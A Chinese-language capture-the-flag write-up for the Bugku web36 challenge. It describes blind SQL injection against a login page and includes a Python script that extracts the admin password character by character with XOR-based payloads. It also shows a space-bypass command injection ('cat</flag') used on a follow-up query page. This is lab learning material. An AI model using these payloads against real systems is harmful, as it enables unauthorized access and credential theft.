Bugku-web36(sql注入)

发布时间 2023-08-30 09:04:03作者: KAKSKY

images

这个题目对于我来说还是很有难度的;;;毕竟我菜;;;唉;;;

打开页面是个登录界面::

images

扫描看了一圈发现这个images下面有这个sql的图片,这个是sql注入问题没错了,但是怎么注入是个问题;;sql注入学的太菜了;还是好好补基础;

images

看了各种大师傅的blog还是挺懵逼的;;;

select user from mysql.user where user=''0;
select user from mysql.user where user=''1;
select user from mysql.user where user=''!=(mid(user)from(-1))='t');

有个脚本可以看看;;

import requests

url='http://114.67.246.176:17939/login.php'

flag=""
for j in range(1,50):
    for i in range(32,128):
            payload = "admin'^(ascii(substr((select(passwd)from(admin))from("+str(j)+")))="+str(i)+")^'1"
            data = {
                "uname": payload,
                "passwd": "123"
            }
            test = requests.post(url=url,data=data).text
            if 'password' in test:
                flag += chr(i)
                print(flag)
                break

images
跑出来之后md5解密是bugkuctf,账号是‘-0-’

登录之后是个查询页面,这个查询页面需要绕过空格;;;大师傅们都是用<绕过的;;

cat</flag

images
burp爆破的方式::

images
images
images
images
images
先按照1筛选出没有打勾的,然后按照2升序排序,再计算3的ASCII码值;;凑出来的是::4dcc88f8f1bc05e7c2ad1a60288481a2;;再进行md5解密;;这个题目确实用脚本快很多;;